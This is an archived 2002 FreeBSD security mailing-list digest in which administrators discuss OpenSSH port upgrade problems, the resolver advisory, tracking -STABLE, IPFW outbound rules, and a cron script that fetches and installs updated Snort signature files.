Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by mx1.FreeBSD.org (Postfix) with ESMTP id B2C6743E0A for ; Mon, 1 Jul 2002 13:34:27 -0700 (PDT) (envelope-from pjklist@ekahuna.com) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Mon, 1 Jul 2002 13:34:26 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: security@FreeBSD.ORG Date: Mon, 1 Jul 2002 13:34:26 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: security-digest V5 #572 Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020701203426516.AAA817@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Sat, Jun 29, 2002 at 07:25:08PM -0500, Jack L. Stone wrote: > > At 07:47 PM 6.29.2002 -0500, Scott Robbins wrote: > > >On Sat, Jun 29, 2002 at 05:35:50PM -0500, Jack L. Stone wrote: > > >> At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote: > > >> >cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE > > >> install distclean > > >> > > > >> I just ran this on a test box and the sshd version shows no change... I saw > > >> it compile and install, but #sshd -V gives old version #... > > >> > > >> What did I do wrong here...?? > > > > > >BTW after the other Scott's post, I tried it his way--leaving out > > >sshd_enable and sshd_program. Worked quite well--also, one reason I > > >haven't done the overwrite option--as Jonathan said, won't that get > > >clobbered next time you do make world? > > > > > >Interestingly enough, pkg-message suggests doing this--leaving > > >sshd_enable at YES, adding sshd_program and then editing the path, (I > > >assume root's) so that /usr/local/sbin comes before /usr/sbin. > > >However, I've found the lazy man's way, which seems to be efficient as > > >well, to be a combination of Jonathan's and the other Scott's. > > > > > >I realize this is not exactly what Jack is asking, but I'm wondering > > >too--if one does the OVERWRITE, won't it get clobbered upon the next > > >make world? > > > > > >Thanks > > >Scott Robbins > > >> > > This is what worries me too. I deinstalled the ssh port right afterwards, > > but I'm wondering what else is changed. I noticed it updated the > > openssl-0.9.6a to 0.9.6d that I didn't expect. The /var/db/pkg shows that > > "d" version installed. In my case I had installed the "openssh-overwrite-base-3.3p1_1 thing that was made just prior to 3.4 coming out. Then when I found out that our 2.9 was not affected, I just let it overwrite again when I rebuilt (to fix the libc thing) until (as suggested by someone here) I wait until 3.4 gets integrated into the base system. Then I accidentally ran portupgrade with the '*' wildcard [sigh], and when it got to that port it "upgraded" it to openssh-portable... BUT, instead of just nicely installing itself in /usr/local, it REMOVED the existing version 2.9 files, at the same time it did NOT update rc.conf with the new path, so basically left the sshd daemon nonfunctional which I had to fix. Worse yet, I can't get the ssh client to connect to another box, it says "DSA host key..not in list of known hosts", I tried copying the ssh_config to /usr/local/etc/ssh but that didn't help. (it *appears* to be set to look in the right place for the host keys (~/.ssh) but just not finding them) Rather than offering to import the key, it starts giving me an S/key prompt, which I've never seen before. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:41:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7675A37B400 for ; Mon, 1 Jul 2002 13:41:54 -0700 (PDT) Received: from giganda.komkon.org (giganda.komkon.org [63.167.241.66]) by mx1.FreeBSD.org (Postfix) with ESMTP id DE01943E13 for ; Mon, 1 Jul 2002 13:41:53 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id g61KflZ53541; Mon, 1 Jul 2002 16:41:47 -0400 (EDT) (envelope-from str) Date: Mon, 1 Jul 2002 16:41:47 -0400 (EDT) From: Igor Roshchin Message-Id: <200207012041.g61KflZ53541@giganda.komkon.org> To: des@ofug.org, wollman@lcs.mit.edu Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. Cc: security@FreeBSD.ORG In-Reply-To: <200207011850.g61IolTT078907@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Listening to these two smart reputable people, I realize that that it's better to remove it [ssh] from both base and ports. It's time to switch back to UUCP ... 8-% > From owner-freebsd-security@FreeBSD.ORG Mon Jul 1 14:51:06 2002 > Date: Mon, 1 Jul 2002 14:50:47 -0400 (EDT) > From: Garrett Wollman > To: Dag-Erling Smorgrav > Cc: security@FreeBSD.ORG > Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. > > < said: > > > I don't care about the port. Personally, I'd rather it didn't exist, > > and I think admins who install it need to have their head checked. > > I don't care about the base-install ssh. Personally, I'd rather it > didn't exist, and I think admins who install it need to have their > heads checked. So there! > > -GAWollman > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:58: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B4E1A37B400; Mon, 1 Jul 2002 13:58:00 -0700 (PDT) Received: from lmri.ucsb.edu (orion.lmri.ucsb.edu [128.111.199.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6B31843E26; Mon, 1 Jul 2002 13:58:00 -0700 (PDT) (envelope-from stevem@lmri.ucsb.edu) Received: from lysander.lmri.ucsb.edu ([128.111.199.198] helo=lmri.ucsb.edu) by lmri.ucsb.edu with esmtp (Exim 3.31 #4) id 17P8F7-0009hz-00; Mon, 01 Jul 2002 13:57:53 -0700 Message-ID: <3D20C250.1020603@lmri.ucsb.edu> Date: Mon, 01 Jul 2002 13:57:52 -0700 From: Steve McGhee Organization: UC LMRI User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1a) Gecko/20020611 X-Accept-Language: en-us, en MIME-Version: 1.0 To: snort-users@lists.sourceforge.net Cc: freebsd-security@freebsd.org, freebsd-ports@freebsd.org Subject: instant snort sigs for new vulnerabilites X-Enigmail-Version: 0.62.4.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 with all the fuss lately over the new apache worm, etc, id like to know if my machine is getting hit (its patched, just being curious). i know about mod_blowchunks, but im looking for something more general.. it seems to me that snort could see these attacks pretty easily. is there a tool/method out there that will retrieve the *latest* snort signatures automatically? for those of us not running snort via CVS, id like a way to do something like cvsup, but _only_ update my ruleset every night or whatever. i cc: the freebsd team as this might be a cool (simple) port. (something like /usr/ports/security/snort-signatures) this could be helpful to people who are just curious, or maybe could provide some good numbers to shock lazy sysadmins into actually patching their machines. ..of course, this is all assuming there's someone out there writing signatures ;) - -- - -steve ~ .......................................................... ~ Steve McGhee ~ Systems Administrator ~ Linguistic Minority Research Institute ~ UC Santa Barbara ~ phone: (805)893-2683 ~ email: stevem@lmri.ucsb.edu -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 Comment: Using PGP with Mozilla - http://enigmail.mozdev.org iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns BcxrxnUpvAJK3Sczy5nY4Ir5 =9LCO -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 14:48: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CAC4337B400 for ; Mon, 1 Jul 2002 14:48:06 -0700 (PDT) Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by mx1.FreeBSD.org (Postfix) with SMTP id 35C1843E31 for ; Mon, 1 Jul 2002 14:48:06 -0700 (PDT) (envelope-from brian@hyperreal.org) Received: (qmail 31009 invoked from network); 1 Jul 2002 21:47:57 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 1 Jul 2002 21:47:57 -0000 Received: (qmail 27419 invoked by uid 1000); 1 Jul 2002 21:49:59 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Jul 2002 21:49:59 -0000 Date: Mon, 1 Jul 2002 14:49:59 -0700 (PDT) From: Brian Behlendorf To: "Kevin Kinsey, DaleCo, S.P." Cc: freebsd-security@FreeBSD.ORG Subject: Re: security fixes In-Reply-To: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Message-ID: <20020701144619.F6285-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 1 Jul 2002, Kevin Kinsey, DaleCo, S.P. wrote: > As I said, -STABLE's running fine for me > right now and has everytime I've tried it. I too have tracked -STABLE for production machines and generally feel prety confident in doing so. The only time there was something wrong was the /usr/bin/sed bug last week, which caused compiles of ports to start failing in mysterious ways. Took me awhile to figure that out, though the fix was easy (make update; cd /usr/src/usr.bin/sed && make && make install). So mistakes happen, more often than once in a blue moon, but not so often that one should fear tracking -STABLE. Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 15: 1:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8240337B400 for ; Mon, 1 Jul 2002 15:01:38 -0700 (PDT) Received: from web10108.mail.yahoo.com (web10108.mail.yahoo.com [216.136.130.58]) by mx1.FreeBSD.org (Postfix) with SMTP id 4BB7E43E09 for ; Mon, 1 Jul 2002 15:01:38 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020701220138.66193.qmail@web10108.mail.yahoo.com> Received: from [68.5.49.41] by web10108.mail.yahoo.com via HTTP; Mon, 01 Jul 2002 15:01:38 PDT Date: Mon, 1 Jul 2002 15:01:38 -0700 (PDT) From: twig les Subject: Re: instant snort sigs for new vulnerabilites To: Steve McGhee , snort-users@lists.sourceforge.net Cc: freebsd-security@freebsd.org In-Reply-To: <3D20C250.1020603@lmri.ucsb.edu> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That's a good idea for a quick script that I should have had done months ago. As soon as I put out the lastest mystery fire I'll see if I can get a reasonable little Lynx-based cronjob. --- Steve McGhee wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > with all the fuss lately over the new apache worm, > etc, id like to know > if my machine is getting hit (its patched, just > being curious). i know > about mod_blowchunks, but im looking for something > more general.. > > it seems to me that snort could see these attacks > pretty easily. > > is there a tool/method out there that will retrieve > the *latest* snort > signatures automatically? for those of us not > running snort via CVS, id > like a way to do something like cvsup, but _only_ > update my ruleset > every night or whatever. > > i cc: the freebsd team as this might be a cool > (simple) port. (something > like /usr/ports/security/snort-signatures) > > this could be helpful to people who are just > curious, or maybe could > provide some good numbers to shock lazy sysadmins > into actually patching > their machines. > > > ..of course, this is all assuming there's someone > out there writing > signatures ;) > > - -- > - -steve > > ~ > .......................................................... > ~ Steve McGhee > ~ Systems Administrator > ~ Linguistic Minority Research Institute > ~ UC Santa Barbara > ~ phone: (805)893-2683 > ~ email: stevem@lmri.ucsb.edu > > -----BEGIN PGP SIGNATURE----- > Version: PGP 6.5.8 > Comment: Using PGP with Mozilla - > http://enigmail.mozdev.org > > iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns > BcxrxnUpvAJK3Sczy5nY4Ir5 > =9LCO > -----END PGP SIGNATURE----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 15:26:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F38737B400 for ; Mon, 1 Jul 2002 15:26:26 -0700 (PDT) Received: from killedkenny.net (12-225-232-73.client.attbi.com [12.225.232.73]) by mx1.FreeBSD.org (Postfix) with ESMTP id CE3AF43E13 for ; Mon, 1 Jul 2002 15:26:25 -0700 (PDT) (envelope-from blacksun@killedkenny.net) Received: from localhost (blacksun@localhost) by killedkenny.net (8.11.3/8.11.3) with ESMTP id g61MV2B38123 for ; Mon, 1 Jul 2002 15:31:03 -0700 (PDT) (envelope-from blacksun@killedkenny.net) Date: Mon, 1 Jul 2002 15:31:02 -0700 (PDT) From: Maurice Sprague To: freebsd-security@freebsd.org Subject: unsubscribe Message-ID: <20020701153052.P38121-100000@killedkenny.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 15:28:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 10AD837B406 for ; Mon, 1 Jul 2002 15:28:46 -0700 (PDT) Received: from web10103.mail.yahoo.com (web10103.mail.yahoo.com [216.136.130.53]) by mx1.FreeBSD.org (Postfix) with SMTP id D997543E0A for ; Mon, 1 Jul 2002 15:28:45 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020701222845.67617.qmail@web10103.mail.yahoo.com> Received: from [68.5.49.41] by web10103.mail.yahoo.com via HTTP; Mon, 01 Jul 2002 15:28:45 PDT Date: Mon, 1 Jul 2002 15:28:45 -0700 (PDT) From: twig les Subject: Re: unsubscribe To: freebsd-security@freebsd.org In-Reply-To: <20020701153052.P38121-100000@killedkenny.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Was it something I said? --- Maurice Sprague wrote: > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 16:36:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C771B37B400 for ; Mon, 1 Jul 2002 16:36:22 -0700 (PDT) Received: from 66-162-33-178.gen.twtelecom.net (66-162-33-178.gen.twtelecom.net [66.162.33.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id 611D643E0A for ; Mon, 1 Jul 2002 16:36:22 -0700 (PDT) (envelope-from sfrancis@expertcity.com) Received: from [10.4.2.41] (helo=expertcity.com) by 66-162-33-178.gen.twtelecom.net with esmtp (Exim 3.22 #4) id 17PAiT-0002OM-00; Mon, 01 Jul 2002 16:36:21 -0700 Message-ID: <3D20E7F7.6040807@expertcity.com> Date: Mon, 01 Jul 2002 16:38:31 -0700 From: Steve Francis User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us MIME-Version: 1.0 To: twig les Cc: Steve McGhee , snort-users@lists.sourceforge.net, freebsd-security@freebsd.org Subject: Re: instant snort sigs for new vulnerabilites References: <20020701220138.66193.qmail@web10108.mail.yahoo.com> Content-Type: multipart/alternative; boundary="------------010201040502090703020009" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --------------010201040502090703020009 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit I have this called from cron: #Update rules cd /tmp rm -rf rules /usr/local/bin/wget http://www.snort.org/downloads/snortrules.tar.gz tar -xzf snortrules.tar.gz rm snortrules.tar* mv /tmp/rules/*.rules /usr/local/share/snort # Restart snort (doing it with stop/start restarts the snort-NNNN@NNNN.log # file). /usr/local/etc/rc.d/snort.sh stop >/dev/null if [ -d $ARCHIVE ]; then cd $SNORTLOG mv *-snort.log $ARCHIVE fi /usr/local/etc/rc.d/snort.sh start >/dev/null twig les wrote: >That's a good idea for a quick script that I should >have had done months ago. As soon as I put out the >lastest mystery fire I'll see if I can get a >reasonable little Lynx-based cronjob. > > >--- Steve McGhee wrote: > >>-----BEGIN PGP SIGNED MESSAGE----- >>Hash: SHA1 >> >> >>with all the fuss lately over the new apache worm, >>etc, id like to know >>if my machine is getting hit (its patched, just >>being curious). i know >>about mod_blowchunks, but im looking for something >>more general.. >> >>it seems to me that snort could see these attacks >>pretty easily. >> >>is there a tool/method out there that will retrieve >>the *latest* snort >>signatures automatically? for those of us not >>running snort via CVS, id >>like a way to do something like cvsup, but _only_ >>update my ruleset >>every night or whatever. >> >>i cc: the freebsd team as this might be a cool >>(simple) port. (something >>like /usr/ports/security/snort-signatures) >> >>this could be helpful to people who are just >>curious, or maybe could >>provide some good numbers to shock lazy sysadmins >>into actually patching >>their machines. >> >> >>..of course, this is all assuming there's someone >>out there writing >>signatures ;) >> >>- -- >>- -steve >> >>~ >> >.......................................................... > >>~ Steve McGhee >>~ Systems Administrator >>~ Linguistic Minority Research Institute >>~ UC Santa Barbara >>~ phone: (805)893-2683 >>~ email: stevem@lmri.ucsb.edu >> >>-----BEGIN PGP SIGNATURE----- >>Version: PGP 6.5.8 >>Comment: Using PGP with Mozilla - >>http://enigmail.mozdev.org >> >> >iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns > >>BcxrxnUpvAJK3Sczy5nY4Ir5 >>=9LCO >>-----END PGP SIGNATURE----- >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of >>the message >> > > >===== >----------------------------------------------------------- >Only fools have all the answers. >----------------------------------------------------------- > >__________________________________________________ >Do You Yahoo!? >Yahoo! - Official partner of 2002 FIFA World Cup >http://fifaworldcup.yahoo.com > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > --------------010201040502090703020009 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit I have this called from cron:
#Update rules
cd /tmp
rm -rf rules
/usr/local/bin/wget http://www.snort.org/downloads/snortrules.tar.gz
tar -xzf snortrules.tar.gz
rm snortrules.tar*
mv /tmp/rules/*.rules /usr/local/share/snort

# Restart snort (doing it with stop/start restarts the snort-NNNN@NNNN.log
# file).
        /usr/local/etc/rc.d/snort.sh stop >/dev/null
        if [ -d $ARCHIVE ]; then
                cd $SNORTLOG
                mv *-snort.log $ARCHIVE
        fi
        /usr/local/etc/rc.d/snort.sh start >/dev/null

twig les wrote:
That's a good idea for a quick script that I should
have had done months ago.  As soon as I put out the
lastest mystery fire I'll see if I can get a
reasonable little Lynx-based cronjob.


--- Steve McGhee <stevem@lmri.ucsb.edu> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


with all the fuss lately over the new apache worm,
etc, id like to know
if my machine is getting hit (its patched, just
being curious). i know
about mod_blowchunks, but im looking for something
more general..

it seems to me that snort could see these attacks
pretty easily.

is there a tool/method out there that will retrieve
the *latest* snort
signatures automatically? for those of us not
running snort via CVS, id
like a way to do something like cvsup, but _only_
update my ruleset
every night or whatever.

i cc: the freebsd team as this might be a cool
(simple) port. (something
like /usr/ports/security/snort-signatures)

this could be helpful to people who are just
curious, or maybe could
provide some good numbers to shock lazy sysadmins
into actually patching
their machines.


..of course, this is all assuming t
here's someone
out there writing
signatures  ;)

- --
- -steve

~ 

..........................................................
~        Steve McGhee
~        Systems Administrator
~        Linguistic Minority Research Institute
~        UC Santa Barbara
~        phone: (805)893-2683
~        email: stevem@lmri.ucsb.edu

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
Comment: Using PGP with Mozilla -
http://enigmail.mozdev.org


iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns
BcxrxnUpvAJK3Sczy5nY4Ir5
=9LCO
-----END PGP SIGNATURE-----


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of
the message


=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------

__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

--------------010201040502090703020009-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:22:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7D22037B400 for ; Mon, 1 Jul 2002 17:22:46 -0700 (PDT) Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 69A5843E26 for ; Mon, 1 Jul 2002 17:22:45 -0700 (PDT) (envelope-from minter@bunning.skiltech.com) Received: (from root@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QKgfS57805; Wed, 26 Jun 2002 16:42:41 -0400 (EDT) (envelope-from minter) Received: (from minter@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QKgdg57796; Wed, 26 Jun 2002 16:42:39 -0400 (EDT) (envelope-from minter) Date: Wed, 26 Jun 2002 16:42:39 -0400 (EDT) From: "H. Wade Minter" X-X-Sender: minter@bunning.skiltech.com To: Brett Glass Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <4.3.2.7.2.20020626143023.022716c0@localhost> Message-ID: <20020626164206.P57680-100000@bunning.skiltech.com> X-Folkin-Excellent: Eddie From Ohio (efohio.com) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brett Glass wrote: > Worse than that. Every package or port must be reinstalled > or rebuilt too. Ditto everything you've built from source. > Basically, the entire system must be ripped up by the roots. > > This is scary. I wouldn't think that ports or packages that don't statically link a resolver would need to be recompiled. --Wade -- 'I say to you that the VCR is to the American film producer and the American public as the Boston strangler is to the woman home alone.' Jack Valenti on VCRs, 1982 'It's getting clear -- alarmingly clear, I might add -- that we are in the midst of the possibility of Armageddon.' Jack Valenti on the Internet, 2002 http://www.digitalconsumer.org/ http://digitalspeech.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:34:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 04A4E37B400 for ; Mon, 1 Jul 2002 17:34:32 -0700 (PDT) Received: from inigo.digitaldeck.com (twindolphin.digitaldeck.com [66.124.240.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7E41043E09 for ; Mon, 1 Jul 2002 17:34:31 -0700 (PDT) (envelope-from chris@digitaldeck.com) Received: from IVANOVA2K (ivanova-2k.office-ca1.digitaldeck.com [192.168.1.133]) by inigo.digitaldeck.com (8.11.6/8.11.3) with SMTP id g620YVu61296 for ; Mon, 1 Jul 2002 17:34:31 -0700 (PDT) (envelope-from chris@digitaldeck.com) From: "Chris McCluskey" To: Subject: FW: Which SSH now (and when)? Date: Mon, 1 Jul 2002 17:35:08 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I didn't get any response from -questions, so I thought I would try here. I know some are stupid, but keep with me ok?! ___ I was hoping that everyone out there can clarify a couple questions (and/or possibly false statements) I have regarding SSH. FreeBSD (4.5) SSH in the system source is (or was) built from OpenSSH3.3? FreeBSD (4.5) ships with the SSH ports (ssh and ssh2) from ssh.com? To stay consistent with the FreeBSD project then, it would be a good idea to build out of the openssh or openssh-portable ports instead of the ssh/ssh2 ports -- using the portable port if and only if PAM support is needed? Have the security issues recently released from ISS and OpenSSH have been fixed and the ports in openssh and openssh-portable (both OpenSSH 3.4) have been initially tested, and found to be ok in the following areas -- 1) ChallengeResponseAuth is now fixed, 2) key exchanges with previously created DSA or RSA keys are now working currently, and 3) PRIVSEP is now enabled by default in both openssh ports? Are there any issues that should keep me from using the ssh.com ports (besides the possible security issues with SSH1 on a protocol level) and the lack of a PRIVSEP mechanism? Thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:45:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 143CF37B400 for ; Mon, 1 Jul 2002 17:45:41 -0700 (PDT) Received: from mail2.home.nl (mail2.home.nl [213.51.129.226]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2F8BB43E0A for ; Mon, 1 Jul 2002 17:45:40 -0700 (PDT) (envelope-from nascar24@home.nl) Received: from winxp ([217.120.146.224]) by mail2.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20020702004740.BZCM27206.mail2.home.nl@winxp>; Tue, 2 Jul 2002 02:47:40 +0200 Message-ID: <007301c22161$c9c76ef0$0200a8c0@winxp> From: "nascar24" To: "Gerhard Sittig" , References: <01a001c22107$3d3b2850$0200a8c0@winxp> <20020701214825.L1494@shell.gsinet.sittig.org> Subject: Re: Making a firewall more closed Date: Tue, 2 Jul 2002 02:45:37 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Disposition-Notification-To: "nascar24" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What I mean is that I want to grand acces to the internet. But only to ports I 'trust', like 80,21,22 etc. But when I make a rule like: add 550 allow ip from me to any 80,21,22 I cannot acces a website, that puzzles me. > On Mon, Jul 01, 2002 at 15:57 +0200, nascar24 wrote: > > > > I've been using the IPFW for some time now but I have one problem. I have > > closed my firewall (I guess) from attacks from the outside world. But I am > > open to attacks from within, i.e: trojan horses etc. > > > > Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But if I > > change them to 21,22,80,8080 I cannot connect to any websites or FTP sites. > > > > [ filter rule set snipped ] > > > > I hope you can help, thanks in advance. > > What exactly is your question? > > If you want to "less trust the inside", close the inner interface > as much as 